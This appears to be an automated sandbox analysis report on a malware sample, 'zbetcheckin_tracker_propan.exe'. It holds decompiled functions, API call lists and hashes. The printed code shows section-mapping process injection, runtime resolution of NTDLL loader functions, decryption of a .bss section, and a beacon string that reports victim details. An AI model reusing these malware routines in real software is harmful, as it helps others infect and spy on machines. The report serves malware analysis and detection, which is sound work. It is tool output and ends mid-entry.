				struct _OSVERSIONINFOA* _t79;
				long _t80;
				void* _t81;

				_push(0x60);
				_push(0x418c10);
				E0040D48C(__ebx, __edi, __esi);
				 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
				GetStartupInfoA(_t81 - 0x70);
				 *(_t81 - 4) = 0xfffffffe;
				_t79 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t79 != 0) {
					_t79->dwOSVersionInfoSize = 0x94;
					_t29 = GetVersionExA(_t79); // executed
					_push(_t79);
					_push(0);
					__eflags = _t29;
					if(_t29 != 0) {
						 *(_t81 - 0x20) = _t79->dwPlatformId;
						 *(_t81 - 0x24) = _t79->dwMajorVersion;
						 *(_t81 - 0x28) = _t79->dwMinorVersion;
						_t77 = _t79->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t80 =  *(_t81 - 0x20);
						__eflags = _t80 - 2;
						if(_t80 != 2) {
							_t77 = _t77 | 0x00008000;
							__eflags = _t77;
						}
						_t67 =  *(_t81 - 0x24);
						_t73 =  *(_t81 - 0x28);
						 *0x43607c = _t80;
						 *0x436084 = (_t67 << 8) + _t73;
						 *0x436088 = _t67;
						 *0x43608c = _t73;
						 *0x436080 = _t77;
						 *(_t81 - 0x20) = E0040C7F1((_t67 << 8) + _t73);
						_t39 = E0040ED3B(1, _t73, _t77, 1);
						_pop(_t68);
						__eflags = _t39;
						if(_t39 == 0) {
							E0040C7CD(_t39, _t80);
							_t68 = 0x1c;
						}
						_t40 = E0040FBFF(1);
						__eflags = _t40;
						if(_t40 == 0) {
							E0040C7CD(_t40, _t80);
							_t68 = 0x10;
						}
						E0040F808();
						 *(_t81 - 4) = 1;
						_t42 = E0040F5C8(1, _t73, _t77, _t80, __eflags);
						__eflags = _t42;
						if(_t42 < 0) {
							E0040CDF0(_t73, 0x1b);
							_pop(_t68); // executed
						}
						_t43 = GetCommandLineA(); // executed
						 *0x436c14 = _t43;
						 *0x436068 = E0040F493(); // executed
						_t45 = E0040F3DA(_t68); // executed
						__eflags = _t45;
						if(_t45 < 0) {
							E0040CDF0(_t73, 8);
							_pop(_t68);
						}
						_t46 = E0040F167(_t68, _t73);
						__eflags = _t46;
						if(_t46 < 0) {
							E0040CDF0(_t73, 9);
						}
						_t47 = E0040CF0C(1, _t77, _t80, _t81, 1);
						_pop(_t69);
						__eflags = _t47;
						if(_t47 != 0) {
							E0040CDF0(_t73, _t47);
							_pop(_t69);
						}
						_t48 = E0040F10A(_t69);
						__eflags =  *(_t81 - 0x44) & 1;
						if(__eflags == 0) {
							_t70 = 0xa;
						} else {
							_t70 =  *(_t81 - 0x40) & 0x0000ffff;
						}
						_t49 = E00408C00(__eflags, 0x400000, 0, _t48, _t70); // executed
						 *((intOrPtr*)(_t81 - 0x1c)) = _t49;
						__eflags =  *(_t81 - 0x20);
						if( *(_t81 - 0x20) == 0) {
							E0040D06C(_t49);
						}
						E0040D08E();
						 *(_t81 - 4) = 0xfffffffe;
						_t51 =  *((intOrPtr*)(_t81 - 0x1c));
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L25;
					}
				} else {
					_push(0x12);
					E0040C7CD(_t28, _t79);
					L25:
					_t51 = 0xff;
				}
				return E0040D4D1(_t51);
			}

0x0040c832
0x0040c834
0x0040c839
0x0040c83e
0x0040c846
0x0040c84c
0x0040c86a
0x0040c86e
0x0040c87d
0x0040c880
0x0040c886
0x0040c887
0x0040c889
0x0040c88b
0x0040c89e
0x0040c8a4
0x0040c8aa
0x0040c8b0
0x0040c8b9
0x0040c8bf
0x0040c8c2
0x0040c8c5
0x0040c8c7
0x0040c8c7
0x0040c8c7
0x0040c8cd
0x0040c8d5
0x0040c8da
0x0040c8e0
0x0040c8e5
0x0040c8eb
0x0040c8f1
0x0040c8fc
0x0040c903
0x0040c908
0x0040c909
0x0040c90b
0x0040c90f
0x0040c914
0x0040c914
0x0040c915
0x0040c91a
0x0040c91c
0x0040c920
0x0040c925
0x0040c925
0x0040c926
0x0040c92b
0x0040c92e
0x0040c933
0x0040c935
0x0040c939
0x0040c93e
0x0040c93e
0x0040c93f
0x0040c945
0x0040c94f
0x0040c954
0x0040c959
0x0040c95b
0x0040c95f
0x0040c964
0x0040c964
0x0040c965
0x0040c96a
0x0040c96c
0x0040c970
0x0040c975
0x0040c977
0x0040c97c
0x0040c97d
0x0040c97f
0x0040c982
0x0040c987
0x0040c987
0x0040c988
0x0040c98d
0x0040c990
0x0040c99a
0x0040c992
0x0040c992
0x0040c992
0x0040c9a4
0x0040c9a9
0x0040c9ac
0x0040c9b0
0x0040c9b3
0x0040c9b3
0x0040c9b8
0x0040c9ed
0x0040c9f4
0x0040c88d
0x0040c890
0x00000000
0x0040c890
0x0040c870
0x0040c870
0x0040c872
0x0040ca07
0x0040ca07
0x0040ca07
0x0040ca11

APIs

GetStartupInfoA.KERNEL32 ref: 0040C846
GetProcessHeap.KERNEL32(00000000,00000094), ref: 0040C861
HeapAlloc.KERNEL32(00000000), ref: 0040C864
GetVersionExA.KERNEL32(00000000), ref: 0040C880
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C88D
HeapFree.KERNEL32(00000000), ref: 0040C890
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C8B6
HeapFree.KERNEL32(00000000), ref: 0040C8B9

Part of subcall function 0040ED3B: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040C908,00000001), ref: 0040ED4C
Part of subcall function 0040ED3B: HeapDestroy.KERNEL32 ref: 0040ED82

Part of subcall function 0040FBFF: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040C91A), ref: 0040FC05
Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsAlloc,?), ref: 0040FC27
Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040FC34
Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040FC41
Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040FC4E
Part of subcall function 0040FBFF: TlsAlloc.KERNEL32 ref: 0040FC9E
Part of subcall function 0040FBFF: TlsSetValue.KERNEL32(00000000), ref: 0040FCB9
Part of subcall function 0040FBFF: GetCurrentThreadId.KERNEL32 ref: 0040FD68

Part of subcall function 0040F5C8: GetStartupInfoA.KERNEL32 ref: 0040F5DD
Part of subcall function 0040F5C8: GetFileType.KERNEL32(00000028), ref: 0040F6F3
Part of subcall function 0040F5C8: GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
Part of subcall function 0040F5C8: GetFileType.KERNEL32(00000000), ref: 0040F78F
Part of subcall function 0040F5C8: SetHandleCount.KERNEL32 ref: 0040F7E7

GetCommandLineA.KERNELBASE ref: 0040C93F

Part of subcall function 0040F493: GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4AF
Part of subcall function 0040F493: GetLastError.KERNEL32(?,00000001,?,?,0040C94F), ref: 0040F4C3
Part of subcall function 0040F493: GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4E9
Part of subcall function 0040F493: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,0040C94F), ref: 0040F524
Part of subcall function 0040F493: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000001,?,?,0040C94F), ref: 0040F546
Part of subcall function 0040F493: FreeEnvironmentStringsW.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F55F
Part of subcall function 0040F493: GetEnvironmentStrings.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F571
Part of subcall function 0040F493: FreeEnvironmentStringsA.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F5A2
Part of subcall function 0040F493: FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9

Part of subcall function 0040F3DA: GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404

Part of subcall function 0040F167: _strlen.LIBCMT ref: 0040F193
Part of subcall function 0040F167: _strlen.LIBCMT ref: 0040F1C4

Strings

h,_, xrefs: 0040C945

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$EnvironmentStrings$Free$AddressProc$FileHandleProcess$AllocByteCharInfoModuleMultiStartupTypeWide_strlen$CommandCountCreateCurrentDestroyErrorLastLineNameThreadValueVersion
String ID: h,_
API String ID: 3907968970-2069914689
Opcode ID: 0e1ba8a70bdcb5aecff0d67bce20ad962303cde3b3cbfb059cd92a248f2293d7
Instruction ID: 5d630ab8e8d1f71dbe48f748969ac0a7fb88001ae332b38b52cff797b0183284
Opcode Fuzzy Hash: 0e1ba8a70bdcb5aecff0d67bce20ad962303cde3b3cbfb059cd92a248f2293d7
Instruction Fuzzy Hash: B14181B1940305DADB24EBB6DC86BAE36B4AF04358F10463FF445B72C2DB7C98419A6C

Function 0040143E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 195
native

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040143E(void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed int _t96;
				int _t98;
				intOrPtr _t104;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t115;
				unsigned int _t116;
				intOrPtr _t121;
				intOrPtr _t124;
				unsigned int _t131;
				signed int _t133;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t146;
				intOrPtr _t154;
				void* _t155;
				signed int _t158;
				void* _t161;
				void* _t162;

				_t161 = __esi;
				_t96 = _a8 & 0x00000010;
				_v32 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v36 = E00401699;
				_v44 = _t96;
				if(_t96 != 0 || ( *0x405480 & 0x00000001) == 0) {
					_v20 =  *_t161;
					_t98 =  *(_t161 + 0x10);
					_t155 = _v20;
				} else {
					_t155 =  *(__esi + 8);
					_t98 =  *(__esi + 0x14);
					_v36 =  &E00405070;
					_v20 = _t155;
				}
				_v28 = _t98;
				if(_t155 != 0) {
					if( *_t155 == 0x5a4d) {
						L10:
						_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x3c)) + _t155 + 0x50)) + 0x00000fff & 0xfffff000;
						_t104 = E0040192F( *(_t161 + 0x14) + _t158 +  *(_t161 + 0x10) + 0xc50,  &_v16,  &_v24); // executed
						_v8 = _t104;
						if(_t104 != 0) {
							L30:
							if(_v16 != 0) {
								RtlNtStatusToDosError(NtUnmapViewOfSection(0xffffffff, _v16));
							}
							if(_v24 != 0) {
								CloseHandle(_v24);
							}
							L34:
							if(_v32 != 0) {
								memset(_v32, 0, _v28);
								E0040105B(_v32);
							}
							goto L36;
						}
						_t139 =  *0x405498; // 0x736c6e70
						_t142 = (_t139 ^ 0x736c6220) + _t158 + _v16;
						_v40 = _t142;
						_t113 = E004018F0(_v24,  *_a4,  &_v12); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L30;
						}
						_t114 = E004019EE(_v16, _v20, _v12);
						_v8 = _t114;
						if(_t114 != 0) {
							goto L30;
						}
						_t115 =  *(_t161 + 0x10);
						if(_t115 != 0) {
							memcpy(_t142,  *_t161, _t115);
							_t162 = _t162 + 0xc;
						}
						_t116 =  *(_t161 + 0x14);
						if(_t116 == 0) {
							L20:
							_t143 = _v16 + _t158;
							asm("cdq");
							 *((intOrPtr*)(_t143 + 0x30)) = _v12;
							 *((intOrPtr*)(_t143 + 0x34)) = _t154;
							memcpy(_t143 + 0x18, _t161, 0x18);
							_t162 = _t162 + 0xc;
							if( *(_t161 + 0x10) != 0) {
								asm("cdq");
								 *(_t143 + 0x18) = _t158 + _v12 + 0xc50;
								 *((intOrPtr*)(_t143 + 0x1c)) = _t154;
							}
							if( *(_t161 + 0x14) != 0) {
								asm("cdq");
								 *((intOrPtr*)(_t143 + 0x20)) = _v12 + _t158 +  *(_t161 + 0x10) + 0xc50;
								 *((intOrPtr*)(_t143 + 0x24)) = _t154;
							}
							if(_v44 != 0 || ( *0x405480 & 0x00000001) == 0) {
								_t121 = E004012F6(_t154, _t143);
							} else {
								_push( *_a4);
								_t121 = E0040139F(_t154, _t143);
							}
							_v8 = _t121;
							if(_t121 == 0) {
								memcpy(_t143 + 0x40, _v36, 0x800);
								_t162 = _t162 + 0xc;
								_t124 = E0040240C(_t154, _a4, _t158 + _v12 + 0x40, _t158 + _v12, _a8); // executed
								_v8 = _t124;
							}
							goto L30;
						} else {
							_t131 = _t116 >> 2;
							_v20 = _t131;
							if(_t131 == 0) {
								goto L20;
							}
							while(1) {
								_t133 = _v20 << 2;
								_t49 =  &_v20;
								 *_t49 = _v20 - 1;
								_t154 = _t142 + _t133;
								 *((intOrPtr*)(_t154 +  *(_t161 + 0x10) - 4)) =  *((intOrPtr*)(_t133 +  *((intOrPtr*)(_t161 + 8)) - 4));
								if( *_t49 == 0) {
									goto L20;
								}
								_t142 = _v40;
							}
							goto L20;
						}
					}
					_t146 = E00401046(_v28);
					_v32 = _t146;
					if(_t146 != 0) {
						E00402B7A(_t146, _t155, _v28,  *0x405494, 0);
						_v20 = _t146;
						_t155 = _t146;
						goto L10;
					} else {
						_v8 = 8;
						goto L34;
					}
				} else {
					_v8 = 2;
					L36:
					return _v8;
				}
			}

0x0040143e
0x0040144a
0x0040144e
0x00401451
0x00401454
0x00401457
0x0040145a
0x00401461
0x00401464
0x00401483
0x00401486
0x00401489
0x0040146f
0x0040146f
0x00401472
0x00401475
0x0040147c
0x0040147c
0x0040148e
0x00401491
0x004014a4
0x004014dc
0x004014f0
0x00401508
0x0040150f
0x00401512
0x0040164b
0x0040164f
0x0040165d
0x0040165d
0x00401667
0x0040166c
0x0040166c
0x00401672
0x00401676
0x00401680
0x0040168b
0x0040168b
0x00000000
0x00401676
0x00401518
0x00401532
0x00401535
0x00401538
0x0040153f
0x00401542
0x00000000
0x00000000
0x00401551
0x00401558
0x0040155b
0x00000000
0x00000000
0x00401561
0x00401566
0x0040156c
0x00401571
0x00401571
0x00401574
0x00401579
0x004015a4
0x004015a7
0x004015ad
0x004015b0
0x004015b8
0x004015bb
0x004015c0
0x004015c7
0x004015d3
0x004015d4
0x004015d7
0x004015d7
0x004015de
0x004015ef
0x004015f0
0x004015f3
0x004015f3
0x004015fa
0x00401613
0x00401605
0x00401608
0x0040160b
0x0040160b
0x0040161a
0x0040161d
0x0040162b
0x00401633
0x00401643
0x00401648
0x00401648
0x00000000
0x0040157b
0x0040157b
0x0040157e
0x00401581
0x00000000
0x00000000
0x00401588
0x0040158e
0x00401591
0x00401591
0x00401594
0x0040159e
0x004015a2
0x00000000
0x00000000
0x00401585
0x00401585
0x00000000
0x00401588
0x00401579
0x004014ae
0x004014b2
0x004014b5
0x004014d2
0x004014d7
0x004014da
0x00000000
0x004014b7
0x004014b7
0x00000000
0x004014b7
0x00401493
0x00401493
0x00401690
0x00401696
0x00401696

APIs

Part of subcall function 0040192F: NtCreateSection.NTDLL ref: 0040198A
Part of subcall function 0040192F: memset.NTDLL ref: 004019AF
Part of subcall function 0040192F: RtlNtStatusToDosError.NTDLL ref: 004019CB
Part of subcall function 0040192F: ZwClose.NTDLL(?), ref: 004019DF

memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040156C
memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004015BB

Part of subcall function 004012F6: GetModuleHandleA.KERNELBASE(NTDLL.DLL,?,?,00401618,?,?,?,00000000), ref: 00401329
Part of subcall function 004012F6: memcpy.NTDLL(?,00405444,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 00401390

memcpy.NTDLL(?,00401699,00000800,?,?,?,00000000), ref: 0040162B

Part of subcall function 0040240C: memset.NTDLL ref: 0040242B

Part of subcall function 0040139F: memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,00401610,?,?,?,?,00000000), ref: 00401430

NtUnmapViewOfSection.NTDLL ref: 00401656
RtlNtStatusToDosError.NTDLL ref: 0040165D
CloseHandle.KERNEL32 ref: 0040166C
memset.NTDLL ref: 00401680

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Part of subcall function 004018F0: NtMapViewOfSection.NTDLL ref: 0040191D
Part of subcall function 004018F0: RtlNtStatusToDosError.NTDLL ref: 00401924

Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401A4E
Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401A63
Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00401AA5

Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052

Strings

pnls, xrefs: 00401518
pP@, xrefs: 00401624

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocCreateFreeModuleUnmap
String ID: pP@$pnls
API String ID: 115379787-4169950845
Opcode ID: 1996177078d0cca6aeaa3bf44e4445bdb053348a98243eccfb5bd8acbe51d9e0
Instruction ID: 34a7f7512ce7c5b11e24d6413b7ab248df509fd2439dbd4f23d34c87e9ece776
Opcode Fuzzy Hash: 1996177078d0cca6aeaa3bf44e4445bdb053348a98243eccfb5bd8acbe51d9e0
Instruction Fuzzy Hash: E8816DB0900209EFCB10DF98CD85AAEBBB5FF48304F14457AE901B73A1D779AA45DB58

Function 00401C7A, Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 105
memorystring

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401C7A(intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v23;
				char _v24;
				signed int _v32;
				signed int _v36;
				void* _t38;
				intOrPtr* _t39;
				long _t41;
				void* _t42;
				intOrPtr _t46;
				char _t49;
				signed int _t50;
				intOrPtr _t51;
				intOrPtr _t60;
				void* _t65;
				intOrPtr _t66;
				void* _t71;
				intOrPtr _t72;

				_t66 =  *0x405484; // 0x400000
				_t49 = 0;
				_v24 = 0;
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_v16 = _t66;
				_v12 = 0;
				lstrcpynA( &_v24, ".bss", 8);
				_t6 = _t66 + 0x3c; // 0xf0
				_t38 =  *_t6 + _t66;
				_t50 =  *(_t38 + 6) & 0x0000ffff;
				_t39 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
				do {
					if( *_t39 == _v24 &&  *((intOrPtr*)(_t39 + 4)) == _v20) {
						_t49 = _t39;
					}
					_t39 = _t39 + 0x28;
					_t50 = _t50 - 1;
				} while (_t50 != 0 && _t49 == 0);
				if(_t49 == 0) {
					_v12 = 2;
				} else {
					_t51 =  *((intOrPtr*)(_t49 + 0xc));
					if(_t51 == 0 ||  *(_t49 + 0x10) == 0) {
						_v12 = 0xb;
					} else {
						_t41 =  *(_t49 + 0x10);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t71 = (_t41 + _t51 ^ _v36 ^ _v32) + _a4;
						_t42 = VirtualAlloc(0, _t41, 0x3000, 4); // executed
						_t65 = _t42;
						if(_t65 == 0) {
							_v12 = 8;
						} else {
							_t72 = _v16;
							E00402B7A(_t42,  *((intOrPtr*)(_t49 + 0xc)) + _t72,  *(_t49 + 0x10), _t71, 1);
							_t60 =  *((intOrPtr*)(_t49 + 0xc));
							_t46 =  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c4)) -  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061cc)) +  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c0));
							 *0x405498 = _t46;
							if(_t46 != 0x736c6e70) {
								_v12 = 0xc;
							} else {
								memcpy(_t60 + _t72, _t65,  *(_t49 + 0x10));
							}
							VirtualFree(_t65, 0, 0x8000); // executed
						}
					}
				}
				return _v12;
			}

0x00401c82
0x00401c8b
0x00401c8d
0x00401c93
0x00401c94
0x00401c98
0x00401ca2
0x00401ca5
0x00401ca8
0x00401cae
0x00401cb1
0x00401cb7
0x00401cbb
0x00401cbf
0x00401cc4
0x00401cce
0x00401cce
0x00401cd0
0x00401cd3
0x00401cd3
0x00401cdc
0x00401d97
0x00401ce2
0x00401ce2
0x00401ce7
0x00401d8e
0x00401cf7
0x00401cf7
0x00401d02
0x00401d03
0x00401d04
0x00401d16
0x00401d1b
0x00401d21
0x00401d25
0x00401d85
0x00401d27
0x00401d2d
0x00401d35
0x00401d3a
0x00401d4f
0x00401d56
0x00401d5b
0x00401d6e
0x00401d5d
0x00401d64
0x00401d69
0x00401d7d
0x00401d7d
0x00401d25
0x00401ce7
0x00401da5

APIs

lstrcpynA.KERNEL32(?,.bss,00000008,767F1218,0000000C), ref: 00401CA8
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401D1B
memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401D64
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401D7D

Strings

version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 00401D43
pnls, xrefs: 00401D56
Sep 26 2018, xrefs: 00401CFA
.bss, xrefs: 00401C99
pnls, xrefs: 00401D51

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AllocFreelstrcpynmemcpy
String ID: .bss$Sep 26 2018$pnls$pnls$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 2133416149-285809758
Opcode ID: b72512c39d693ed8b00706543c3f9321205c5814dd1b8999c8f547d78f48c8e7
Instruction ID: bb5b1e6df9afdaa59d18c819775b69865eb2f2d7f41d0e3035a9afe091bdc630
Opcode Fuzzy Hash: b72512c39d693ed8b00706543c3f9321205c5814dd1b8999c8f547d78f48c8e7
Instruction Fuzzy Hash: 0B319371A00204ABDF14DF98C984BAFB775FF44704F15806AEA017B295C7B8E945CB99

Function 002D46DF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
memory

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 002D471C
HeapFree.KERNEL32(00000000,00000000), ref: 002D474D
GetComputerNameW.KERNEL32(00000000,?), ref: 002D475B
RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4772
GetComputerNameW.KERNEL32(00000000,?), ref: 002D4783
HeapFree.KERNEL32(00000000,00000000), ref: 002D47A4

Strings

Fv, xrefs: 002D471C, 002D4772

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocateComputerFreeName
String ID: Fv
API String ID: 3439771632-1370784869
Opcode ID: ad7b7e55ee56a703c7ee115c1a5a3847161ab40c9f146853cc86b53f8c7223ca
Instruction ID: 557d4442ebe30a6427b18957dfc37fa62081fe41b81dce0fd39946b22c675263
Opcode Fuzzy Hash: ad7b7e55ee56a703c7ee115c1a5a3847161ab40c9f146853cc86b53f8c7223ca
Instruction Fuzzy Hash: 043109B2E1110AEFDB00DFB5ED899AEBBF9FB48305B11446AE505D3220E730AE54DB50

Function 004012F6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004012F6(signed int __edx, void* _a4) {
				void* __edi;
				struct HINSTANCE__* _t4;
				signed int _t6;
				signed int _t8;
				signed int _t10;
				void* _t17;
				void* _t18;
				signed int _t19;
				void* _t21;

				_t19 = __edx;
				_t21 = 0;
				if(( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0 || ( *0x405454 |  *0x405458) == 0) {
					_t21 = 0x7f;
					_t4 = GetModuleHandleA("NTDLL.DLL"); // executed
					_t20 = _t4;
					if(_t4 != 0) {
						_t6 = E00401DFD(_t17, _t18, _t20, "LdrLoadDll"); // executed
						asm("cdq");
						 *0x405444 = _t6;
						 *0x405448 = _t19;
						if((_t6 | _t19) != 0) {
							_t8 = E00401DFD(_t17, _t18, _t20, "LdrGetProcedureAddress"); // executed
							asm("cdq");
							 *0x40544c = _t8;
							 *0x405450 = _t19;
							if((_t8 | _t19) != 0) {
								_t10 = E00401DFD(_t17, _t18, _t20, "ZwProtectVirtualMemory"); // executed
								asm("cdq");
								 *0x405454 = _t10;
								 *0x405458 = _t19;
								if((_t10 | _t19) != 0) {
									_t21 = 0;
									goto L8;
								}
							}
						}
					}
				} else {
					L8:
					memcpy(_a4, 0x405444, 0x18);
				}
				return _t21;
			}

0x004012f6
0x004012fc
0x00401305
0x00401323
0x00401329
0x0040132f
0x00401333
0x0040133a
0x0040133f
0x00401340
0x00401347
0x0040134d
0x00401354
0x00401359
0x0040135a
0x00401361
0x00401367
0x0040136e
0x00401373
0x00401374
0x0040137b
0x00401381
0x00401383
0x00000000
0x00401383
0x00401381
0x00401367
0x0040134d
0x00401385
0x00401385
0x00401390
0x00401395
0x0040139c

APIs

GetModuleHandleA.KERNELBASE(NTDLL.DLL,?,?,00401618,?,?,?,00000000), ref: 00401329

Part of subcall function 00401DFD: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E4E
Part of subcall function 00401DFD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040133F,LdrLoadDll), ref: 00401E60
Part of subcall function 00401DFD: ReadFile.KERNEL32 ref: 00401E78
Part of subcall function 00401DFD: CloseHandle.KERNEL32 ref: 00401E93

memcpy.NTDLL(?,00405444,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 00401390

Strings

NTDLL.DLL, xrefs: 00401324
ZwProtectVirtualMemory, xrefs: 00401369
LdrLoadDll, xrefs: 00401335
LdrGetProcedureAddress, xrefs: 0040134F

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: File$Handle$CloseCreateModulePointerReadmemcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$ZwProtectVirtualMemory
API String ID: 3176338324-3173696408
Opcode ID: 65062b689a13a5a3c26b3df877b730762d6fcd2f81351f6a0759503d02edc919
Instruction ID: f39fb24f0d1558db3377ed6103870c24b3725bc3a50f5f50e29c628d1969b11c
Opcode Fuzzy Hash: 65062b689a13a5a3c26b3df877b730762d6fcd2f81351f6a0759503d02edc919
Instruction Fuzzy Hash: 7E01D271280A1057D720EB99AE46B9777A1EB90706715443BF808BB6F2D23868808E3E

Function 00290000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285
memory

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 0029018C
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002901FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00290306

Part of subcall function 002905DB: GetProcAddress.KERNELBASE(?,?,?,00290327,2B14D0EE,?), ref: 00290639

Strings

a, xrefs: 002902CB
, xrefs: 002902D6

Memory Dump Source

Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AddressAllocCreateProcProtect
String ID: $a
API String ID: 1018238108-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: a922decac74f9c0bd1a906cd4bb2be369e8a44a7a82da7bf6eb3c6a91c8d2b0b
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: 10C16771618305CFCB24CF64C4C4B2AB7E2FF88714F158A6DE88A9B252C771E859CB56

Function 002DE040, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 226
librarynativeloader

Control-flow Graph

Executed
Not Executed

APIs

